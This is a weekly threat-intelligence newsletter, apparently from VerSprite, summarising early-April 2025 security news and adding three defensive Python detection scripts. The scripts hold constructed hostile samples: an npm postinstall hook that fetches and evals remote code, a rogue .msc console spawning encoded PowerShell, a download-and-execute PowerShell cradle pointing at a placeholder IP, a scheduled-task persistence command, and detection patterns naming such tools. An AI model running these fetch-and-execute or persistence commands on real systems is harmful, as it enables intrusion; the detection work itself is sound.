VerSprite Weekly Threat Intelligence

Date Range: 31 March 2025 – 04 April 2025

Issue: 8th Edition

Security Triumphs of the Week

This week highlighted major strides in cybersecurity defense and enforcement. CISA released an in-depth analysis of RESURGE malware, offering valuable IOCs and detection tools. Microsoft alerted organizations to a tax-themed phishing campaign using QR codes, reinforcing awareness during a high-risk period. Europol successfully dismantled the ‘Kidflix’ child abuse platform, showcasing effective global law enforcement collaboration. Google expanded easy-to-use end-to-end encryption for Gmail business users, strengthening communication security. Microsoft applied AI to uncover vulnerabilities in core bootloaders, advancing proactive threat discovery. The DoJ’s $8M seizure from a crypto scam marked a key victory against financial cybercrime. Together, these developments reflect growing momentum in proactive defense, innovation, and international cooperation.

  • CISA Releases Analysis on RESURGE Malware
    CISA has published a detailed Malware Analysis Report on RESURGE, a threat linked to vulnerabilities in Ivanti Connect Secure. The report includes behavioral details, IOCs, and YARA rules to help defenders detect and block the malware. By making this intelligence public, CISA enables faster response from network defenders. This proactive move supports broader threat awareness across government and private sectors.
    Read full article: CISA
  • Microsoft Detects Tax-Themed QR Code Phishing Campaign
    Microsoft has warned about a phishing campaign using QR codes embedded in PDF attachments, themed around tax filings. Because the malicious URL is carried in an image rather than as text, URL-scanning email filters never see it, and the victim typically scans the code with a personal phone that sits outside corporate web controls. Microsoft’s early detection allows organizations to update filters and educate users before the filing deadline. The alert helps reduce risks during a time of heightened phishing activity.
    Read full article: Thehackernews
  • Europol Shuts Down ‘Kidflix’ Child Abuse Platform
    Europol and international police forces have dismantled the ‘Kidflix’ platform, which hosted and distributed child exploitation content. The operation led to multiple arrests and infrastructure seizures across various countries. Authorities used advanced digital forensics and intelligence sharing to coordinate the takedown. This marks a major win against dark web child abuse networks.
    Read full article: Reuters
  • Google Enables End-to-End Encryption for Gmail Business Users
    Google has begun rolling out end-to-end encrypted email for Gmail enterprise users, initially in beta. It builds on Google’s client-side encryption: message content is encrypted in the browser with keys held by the customer, so neither Google nor intermediate mail servers can read it, and users can send encrypted mail without the certificate exchange that S/MIME requires. Admins can enable it with minimal setup, securing email content from unauthorized access. This move enhances regulatory compliance and protects sensitive communications. It reflects Google’s commitment to making strong encryption more accessible across enterprises.
    Read full article: Google
  • Microsoft Uses AI to Discover Bootloader Vulnerabilities
    Microsoft has used its Security Copilot AI assistant to identify previously unknown vulnerabilities in widely used bootloaders such as GRUB2, U-Boot, and Barebox, some of which could let an attacker with sufficient access bypass UEFI Secure Boot and run code before the operating system loads. The findings were responsibly disclosed and fixed upstream; the fixes reach end users only through firmware and distribution updates, so operators should verify those have landed rather than assume protection. The use of AI in this context shows its growing role in vulnerability discovery and software hardening. This initiative enhances firmware-level security across devices.
    Read full article: BleepingComputer
  • DoJ Seizes $8M from ‘Pig Butchering’ Crypto Scam
    The U.S. Department of Justice has seized over $8 million from a crypto scam known as a “Pig Butchering” scheme. These scams manipulate victims into fake investments over time using social engineering. The funds will aid in restitution and ongoing investigations. The seizure demonstrates growing success in tracing and disrupting financial cybercrime.
    Read full article: DarkReading

Security Setbacks of the Week

This week’s threat landscape reflects an alarming rise in supply chain abuse, state-sponsored espionage, and ransomware activity. North Korea’s Lazarus Group escalated its npm-based malware operations, while the Port of Seattle suffered a data breach impacting 90,000+ individuals. Ukrainian military personnel faced targeted phishing attacks tied to foreign intelligence objectives, and threat actors abused DLL sideloading in signed software to bypass defenses. Additionally, espionage campaigns like HollowQuill are leveraging sophisticated malware delivery via PDFs, signaling continued risk to both government and enterprise sectors.

  • Lazarus Expands Malicious NPM Campaign
    North Korea’s Lazarus Group has broadened its malicious activity in the software supply chain by publishing 11 new npm packages containing malware loaders. These packages abuse postinstall scripts to fetch malicious payloads from Bitbucket, expanding previous campaigns and increasing risk to developers using open-source components.
    Read full article: Socket.dev
  • Port of Seattle Ransomware Attack
    The Port of Seattle has notified roughly 90,000 individuals that their personal data was compromised in the ransomware attack it suffered in August 2024, when the threat actors disrupted port and airport systems and exfiltrated data. The exposed information reportedly includes names, Social Security numbers, and medical information, affecting employees, contractors, and business partners. The months between the intrusion and the notifications illustrate how long establishing the scope of an exfiltration can take.
    Read full article: Daily Security Review
  • CERT-UA Reports Attacks on Ukrainian Military Personnel
    Ukraine’s CERT-UA has revealed a new wave of cyberattacks targeting its armed forces. The campaign involves phishing lures leading to remote access malware deployment and aims to exfiltrate battlefield-relevant data—likely part of larger state-sponsored espionage operations.
    Read full article: The Hacker News
  • Compromised DLLs in Signed Software
    Ontinue researchers report that threat actors are increasingly abusing DLL sideloading: a malicious DLL is placed where a legitimately signed executable will load it, so the attacker’s code runs inside a trusted, signed process. The executable’s signature stays valid because it covers only the binary, not the libraries it loads, and security tools that trust signed processes can therefore miss the malicious code. The technique is used for defense evasion and persistence in enterprise environments, highlighting supply chain blind spots in trusted software.
    Read full article: Ontinue
  • Operation HollowQuill Targets Russian R&D
    The HollowQuill campaign targeted research and development organizations in Russia via spear-phishing emails with malicious PDF attachments. Once opened, these files drop Cobalt Strike payloads to enable lateral movement and espionage-focused operations.
    Read full article: Seqrite
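As an added illustration of the postinstall abuse described in the Lazarus item above (example code written for this edition, not Socket.dev’s, npm’s, or VerSprite’s tooling), the following script walks an installed node_modules tree and flags install-time lifecycle hooks that reach for the network or evaluate code. The two manifests at the bottom are constructed samples, and the heuristics and payload-hosting list are assumptions chosen to mirror the campaign’s tradecraft, so a hit is a lead to review, not proof of compromise.

```python
"""Scan npm package manifests for install-time hooks that fetch or run remote code.

Added example for this newsletter; not tooling from Socket.dev, npm or VerSprite.
The sample manifests at the bottom are constructed for illustration.
"""
import json
import os
import re
from typing import List

# Lifecycle scripts npm runs automatically during `npm install`.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Heuristics (assumed, not exhaustive): remote fetches, inline evaluation,
# encoded payloads and the hosting services seen in loader campaigns.
SUSPICIOUS = [
    (re.compile(r"https?://", re.I), "remote URL in install hook"),
    (re.compile(r"\b(curl|wget)\b", re.I), "network download tool"),
    (re.compile(r"\bnode\s+-e\b"), "inline node evaluation"),
    (re.compile(r"\beval\s*\(", re.I), "eval()"),
    (re.compile(r"base64", re.I), "base64 decode"),
    (re.compile(r"bitbucket\.org|raw\.githubusercontent\.com|pastebin\.com", re.I),
     "payload hosting service"),
]


def audit_manifest(name: str, manifest: dict) -> List[str]:
    """Return human-readable findings for one parsed package.json."""
    findings = []
    scripts = manifest.get("scripts") or {}
    for hook in INSTALL_HOOKS:
        cmd = scripts.get(hook)
        if not cmd:
            continue
        for pattern, label in SUSPICIOUS:
            if pattern.search(cmd):
                findings.append(f"{name}: {hook} -> {label}: {cmd!r}")
    return findings


def audit_tree(root: str) -> List[str]:
    """Walk an installed node_modules tree and audit every package.json in it."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        if "package.json" not in files:
            continue
        path = os.path.join(dirpath, "package.json")
        try:
            with open(path, encoding="utf-8") as fh:
                manifest = json.load(fh)
        except (OSError, ValueError):
            continue  # unreadable or malformed manifest; skip, do not crash the scan
        findings.extend(audit_manifest(manifest.get("name", path), manifest))
    return findings


# Constructed samples: a benign package and one mimicking an install-hook loader
# that pulls a second stage from a code-hosting site and evaluates it in memory.
BENIGN = {"name": "example-benign-pkg", "version": "1.0.0",
          "scripts": {"test": "node test.js", "build": "tsc"}}
MALICIOUS = {"name": "example-malicious-pkg", "version": "0.0.3",
             "scripts": {"postinstall":
                         "node -e \"require('https').get('https://bitbucket.org/x/y/raw/main/l.js',"
                         "r=>{let d='';r.on('data',c=>d+=c);r.on('end',()=>eval(d))})\""}}

if __name__ == "__main__":
    for finding in audit_manifest(BENIGN["name"], BENIGN) + audit_manifest(MALICIOUS["name"], MALICIOUS):
        print(finding)
```

Run `audit_tree("node_modules")` inside a project to check a real install; the manifests above only exercise the rules. Because lifecycle scripts run with the installing user’s privileges, a finding against a package you did not expect to have install hooks deserves the same attention as an unknown binary.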

The New Emerging Threats

This week highlights a wave of stealthy and socially engineered cyber threats. Hackers are distributing ransomware through fake CAPTCHA pages that use the ClickFix technique, tricking users into pasting and running a malicious command themselves. A Russian-linked threat actor is exploiting CVE-2025-26633 to deploy stealth malware like SilentPrism and DarkWisp via the MSC EvilTwin loader. Attackers are also using fake Zoom installers as the entry point for BlackSuit ransomware intrusions, targeting remote users. The newly observed KoiLoader uses PowerShell to deliver payloads while evading detection. Meanwhile, Triton RAT leverages Telegram as a covert C2 channel to control infected systems. These threats reinforce the need for stronger email defenses, script control, and user awareness.

  • Hackers Exploit ClickFix CAPTCHA Scam to Spread Ransomware
    A new ransomware campaign is using the ClickFix social-engineering technique. The victim lands on a page showing a fake CAPTCHA or “verify you are human” check; the page silently copies a command to the clipboard and instructs them to press Win+R, paste, and hit Enter to “complete verification”. The pasted command (typically mshta or PowerShell) fetches and runs the payload, so the user, not an exploit, launches the malware, and browser download warnings never fire. The ransomware then encrypts files and demands cryptocurrency payment. Distribution channels include phishing emails and compromised websites. Organizations are urged to alert on mshta.exe and powershell.exe launched from the Run dialog, consider restricting the Run dialog by policy where feasible, and remind users that no legitimate verification step asks them to paste a command.
    Read full article: NPAV
  • Russian Hackers Exploit CVE-2025-26633 to Deploy SilentPrism and DarkWisp
    A Russian-linked threat actor tracked as Water Gamayun (also known as EncryptHub) is exploiting CVE-2025-26633, a security feature bypass in the Microsoft Management Console (MMC) patched in the March 2025 updates, using a loader dubbed MSC EvilTwin. The trick relies on two .msc console files with the same name: a clean one the victim is lured into opening, and a malicious one placed in a locale subfolder such as en-US that MMC loads instead. The chain deploys SilentPrism, a reconnaissance and persistence backdoor, and DarkWisp, a backdoor used for data theft and remote control. The malware operates with heavy obfuscation, making detection difficult in enterprise networks. Targets include government bodies, infrastructure providers, and sensitive corporate systems. Security experts recommend applying the March update, logging mmc.exe execution and the .msc files it opens, and treating .msc files arriving by email or download as untrusted.
    Read full article: Thehackernews
  • Bogus Zoom Installer Delivers BlackSuit Ransomware
    A campaign documented by The DFIR Report used a fake Zoom installer, served from a spoofed download page, as the entry point for a BlackSuit ransomware intrusion. Victims are directed to spoofed Zoom download pages via phishing emails and malvertising. The installer behaved like Zoom but also ran a loader chain that gave the operators remote access; from there they harvested credentials, moved laterally, and exfiltrated data, deploying BlackSuit across the environment only about nine days after the initial download. BlackSuit is particularly dangerous due to its fast multithreaded encryption and deletion of volume shadow copies. The dwell time between the bogus installer and encryption is the detection window defenders should aim to use; the campaign also highlights the risks of downloading software from unofficial sources.
    Read full article: Thedfirreport
  • KoiLoader Leverages PowerShell to Deliver Malicious Payloads
    KoiLoader is a newly observed malware loader that uses PowerShell scripts to stealthily deploy follow-up payloads such as stealers and RATs. It spreads through phishing emails containing malicious attachments or links to compromised sites. Once active, it establishes persistence using scheduled tasks and leverages built-in Windows tools for lateral movement. KoiLoader’s modular structure allows attackers to tailor payloads based on victim profile or network access. Its use of legitimate tools complicates detection, emphasizing the need for robust PowerShell logging and behavioral analysis tools.
    Read full article: Cyberpress
  • Triton RAT Uses Telegram for Covert Remote Access
    The newly discovered Triton RAT, a Python-based tool, uses Telegram’s Bot API as its Command-and-Control (C2) channel, enabling attackers to remotely access and control infected systems. Delivered via phishing campaigns, Triton allows threat actors to exfiltrate data, execute system commands, and log keystrokes. Because the traffic is ordinary TLS to api.telegram.org, network inspection reveals only the destination (via DNS or the TLS SNI), not the commands, so the useful signals are which process is talking to Telegram and how regularly it polls. It also includes auto-update and persistence mechanisms, increasing its threat potential. Experts recommend monitoring for unauthorized Telegram traffic and blocking suspicious endpoints at the firewall level.
    Read full article: Gbhackers
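To make the MSC EvilTwin item concrete, here is an added example (written for this edition, not analysis code from Trend Micro, Microsoft or VerSprite) that hunts for the file layout the loader depends on: a .msc console shadowed by a same-named copy in a locale subdirectory such as en-US, which MMC resolves ahead of the original. The sample directory tree is constructed inside a temporary folder; the locale-folder pattern and the list of content that should never appear in a console definition are assumptions, so a hit is a lead for a file-level review, not a verdict.

```python
"""Find .msc consoles shadowed by a same-named copy in a locale subfolder.

Added example for this newsletter, not tooling from Trend Micro, Microsoft or VerSprite.
MSC EvilTwin drops a clean console next to a malicious copy of the same name inside a
locale directory (e.g. en-US); MMC loads the localized path first. The sample tree
built below is constructed for illustration.
"""
import os
import re
import tempfile
from typing import List, Tuple

# Locale-style directory names: en-US, de-DE, zh-Hans, ... (assumed pattern)
LOCALE_DIR = re.compile(r"^[a-z]{2}(-[A-Za-z]{2,4})?$")
# Content with no business inside a management console definition (assumed list).
RISKY_CONTENT = re.compile(r"<script|ActiveXObject|eval\(|https?://|powershell|cmd\.exe", re.I)


def find_shadowed_msc(root: str) -> List[Tuple[str, str, bool]]:
    """Return (original, shadow, shadow_has_risky_content) for every shadowed .msc under root."""
    hits = []
    for dirpath, dirs, files in os.walk(root):
        locale_dirs = [d for d in dirs if LOCALE_DIR.match(d)]
        for name in files:
            if not name.lower().endswith(".msc"):
                continue
            for loc in locale_dirs:
                shadow = os.path.join(dirpath, loc, name)
                if not os.path.isfile(shadow):
                    continue
                with open(shadow, "rb") as fh:
                    body = fh.read().decode("utf-8", errors="ignore")
                hits.append((os.path.join(dirpath, name), shadow, bool(RISKY_CONTENT.search(body))))
    return hits


def build_sample_tree() -> str:
    """Create a constructed layout that mimics the two-file trick; returns the root path."""
    root = tempfile.mkdtemp(prefix="msc-demo-")
    os.makedirs(os.path.join(root, "en-US"))
    clean = ("<?xml version='1.0'?><MMC_ConsoleFile><StringTable>"
             "<String>Services</String></StringTable></MMC_ConsoleFile>")
    # Rogue copy: a console definition carrying script that spawns PowerShell.
    rogue = ("<?xml version='1.0'?><MMC_ConsoleFile><StringTable><String>"
             "&lt;script&gt;new ActiveXObject('WScript.Shell').Run('powershell -enc AAAA')&lt;/script&gt;"
             "</String></StringTable></MMC_ConsoleFile>")
    pairs = {"services.msc": rogue, "eventvwr.msc": clean}  # eventvwr: shadowed but benign
    for name, localized in pairs.items():
        with open(os.path.join(root, name), "w", encoding="utf-8") as fh:
            fh.write(clean)
        with open(os.path.join(root, "en-US", name), "w", encoding="utf-8") as fh:
            fh.write(localized)
    return root


if __name__ == "__main__":
    for original, shadow, risky in sorted(find_shadowed_msc(build_sample_tree())):
        print(f"{'RISKY ' if risky else 'shadow'}: {shadow} overrides {original}")
```

Point `find_shadowed_msc` at user-writable locations such as Downloads, Temp and Public folders, where a phished console file would land; the patched MMC no longer prefers the rogue copy, so a hit on a patched host is evidence of an attempted delivery rather than a successful one.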

In-Depth Expert CTI Analysis

The Summary

This week underscored the duality of progress and persistent threats within the cyber domain. While law enforcement operations and AI-driven vulnerability discovery mark meaningful advancements, adversaries continue to evolve tactics across social engineering, supply chain compromise, and stealth malware deployment. State-backed actors remain aggressively active, exploiting geopolitical tensions, seasonal themes, and software trust chains to conduct espionage, disrupt services, and steal data. Enterprise defenders must now balance proactive innovation with deep visibility into shadowed attack vectors.

Proactive Defense and Strategic Foresight

A number of developments stood out this week as proactive defenses gained traction:

  • CISA’s RESURGE Malware Report offered detailed IOCs, behavioral analysis, and YARA rules, arming defenders with actionable detection capabilities for Ivanti-linked exploitation.
  • Microsoft leveraged AI to uncover critical bootloader flaws in GRUB2, U-Boot, and Barebox, showcasing the growing utility of ML-driven static analysis in vulnerability research.
  • DoJ’s $8M crypto scam seizure shows progress in disrupting large-scale fraud campaigns and reallocating stolen assets through legal restitution pipelines.

These examples highlight the importance of scalable, intelligence-led security approaches and public-private collaboration in modern cyber defense.

Evolving Ransomware and Malware Tactics

Threat actors are innovating across delivery methods, evasion, and payload deployment:

  • Fake CAPTCHA pages using the ClickFix technique trick users into pasting and running a malicious command themselves, turning a familiar UI pattern into the initial execution step for ransomware.
  • BlackSuit ransomware is being pushed via spoofed Zoom installers, weaponizing user trust in remote work tools.
  • KoiLoader, a new modular malware loader, uses PowerShell for stealth payload delivery and lateral movement.
  • Triton RAT utilizes Telegram for encrypted C2 communication, blending in with legitimate traffic and making detection more complex.
  • QR code phishing campaigns bypass traditional filters, proving that even legacy attack methods can thrive when creatively retooled.

These trends reinforce the importance of behavior-based detection, PowerShell logging, and tighter controls over script execution environments.
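The PowerShell logging recommended above only pays off if someone triages what it produces. The following added example (written for this edition, not KoiLoader analysis code from Cyberpress or tooling from VerSprite) scores script block log entries for loader-style behaviour and decodes -EncodedCommand payloads so the rules can see through the base64 wrapper. The three sample entries are constructed, and the rule set and weights are assumptions a SOC would tune to its own baseline.

```python
"""Triage PowerShell script block log entries for loader-style behaviour.

Added example for this edition; not KoiLoader analysis code from Cyberpress or
tooling from VerSprite. The log entries are constructed; the rules and weights
are assumptions to be tuned per environment.
"""
import base64
import binascii
import re
from typing import Dict, List, Tuple

# (pattern, weight, label): behaviours typical of PowerShell-based loaders.
RULES: List[Tuple["re.Pattern[str]", int, str]] = [
    (re.compile(r"Invoke-Expression|\bIEX\b", re.I), 3, "dynamic evaluation"),
    (re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Start-BitsTransfer", re.I), 3, "download cradle"),
    (re.compile(r"FromBase64String", re.I), 2, "base64 decode"),
    (re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), 2, "hidden window"),
    (re.compile(r"-nop\b|-noprofile", re.I), 1, "profile bypass"),
    (re.compile(r"-ep\s+bypass|ExecutionPolicy\s+Bypass", re.I), 2, "execution policy bypass"),
    (re.compile(r"schtasks|Register-ScheduledTask", re.I), 2, "scheduled task persistence"),
    (re.compile(r"Add-MpPreference", re.I), 3, "Defender exclusion"),
]
# -EncodedCommand (and its short forms) carries a base64-encoded UTF-16LE script.
ENCODED = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_commands(text: str) -> List[str]:
    """Return the plaintext of every -EncodedCommand payload found in text."""
    decoded = []
    for b64 in ENCODED.findall(text):
        try:
            decoded.append(base64.b64decode(b64).decode("utf-16le"))
        except (binascii.Error, UnicodeDecodeError, ValueError):
            continue  # not really base64/UTF-16; leave the raw text to the rules
    return decoded


def score_script_block(text: str) -> Dict[str, object]:
    """Score one script block; encoded payloads are decoded and scanned as well."""
    decoded = decode_encoded_commands(text)
    # Replace the base64 blob so the rules scan the command line and the decoded
    # script, not the opaque encoding.
    layers = [ENCODED.sub("-enc <encoded>", text)] + decoded
    combined = "\n".join(layers)
    matched = [(w, label) for pattern, w, label in RULES if pattern.search(combined)]
    return {"score": sum(w for w, _ in matched),
            "findings": [label for _, label in matched],
            "decoded": decoded}


def encode_command(cmd: str) -> str:
    """Build a -EncodedCommand argument the way an attacker (or an admin) would."""
    return base64.b64encode(cmd.encode("utf-16le")).decode("ascii")


def triage(blocks: Dict[str, str], threshold: int = 4) -> List[Tuple[str, int]]:
    """Return (name, score) for blocks at or above threshold, highest score first."""
    scored = [(name, score_script_block(text)["score"]) for name, text in blocks.items()]
    return sorted([s for s in scored if s[1] >= threshold], key=lambda s: -s[1])


# Constructed sample script blocks (Event ID 4104 message bodies).
SAMPLE_BLOCKS = {
    "benign": "Get-ChildItem C:\\Logs -Filter *.log | Where-Object Length -gt 1MB | Sort-Object LastWriteTime",
    "loader": "powershell -nop -w hidden -ep bypass -enc " + encode_command(
        "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.7/stage2.ps1')"),
    "persist": "schtasks /create /tn Updater /tr \"powershell -w hidden -File C:\\Users\\Public\\u.ps1\" /sc minute /mo 5",
}

if __name__ == "__main__":
    for name, text in SAMPLE_BLOCKS.items():
        print(name, score_script_block(text))
    print("triage:", triage(SAMPLE_BLOCKS))
```

Script block logging (Event ID 4104) already records the decoded script when PowerShell runs it, but the encoded form still shows up in process-creation events and in logs from other sources, which is why the decoder is worth keeping in the pipeline.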

State-Sponsored and Organized Cybercrime Convergence

State-linked APTs are becoming increasingly indistinguishable from cybercrime groups in terms of infrastructure, tooling, and targeting:

  • Lazarus Group expanded its malicious npm campaign, embedding malware loaders in postinstall scripts hosted on Bitbucket.
  • CERT-UA reported targeted phishing attacks against Ukrainian armed forces, likely aimed at battlefield data collection.
  • A Russian-linked threat actor exploited CVE-2025-26633 using the MSC EvilTwin loader, a pair of same-named .msc console files, to deliver tools like SilentPrism and DarkWisp.
  • Europol’s takedown of ‘Kidflix’ highlighted the success of multinational digital forensics and intelligence sharing in shutting down abuse networks.

The growing operational overlap between state actors and organized cybercriminals is blurring attribution and complicating response strategies.

Operational and Tactical Implications

SOC teams and CISOs should prioritize:

  • Software provenance checks for all third-party and open-source components, especially those involving npm or DLL sideloading.
  • Email security updates, focusing on detection of QR codes, PDF lures, and spoofed software download links.
  • Network segmentation and egress filtering, to detect tools like Telegram being used for C2.
  • Enhanced phishing awareness training, especially tailored for seasonal lures like tax-related scams.
  • IOC ingestion pipelines that can consume shared threat intel from sources like CISA and MITRE in near-real-time.

Forward-Looking Recommendations

  • Adopt Threat-Informed Development: Integrate SBOMs (Software Bill of Materials) and automated dependency checks to detect supply chain risks like malicious npm packages.
  • Enhance Behavioral Telemetry: Invest in UEBA (User and Entity Behavior Analytics) to detect PowerShell misuse, Telegram C2, and sideloading behavior.
  • Elevate Phishing Defenses: Update spam filters for QR and PDF-based attacks, especially around tax season or thematic lures.
  • Implement E2EE and Zero Trust Email: Encourage encryption rollouts and restrict email content access via tokenized or ephemeral access methods.
  • Collaborate with Threat Sharing Communities: Leverage platforms like CISA, MITRE, and ISACs for early warnings and tactical threat intelligence.

Additional Resources & Contact

VerSprite on LinkedIn

VerSprite on Twitter

Email VerSprite

Subscribe for Our Updates
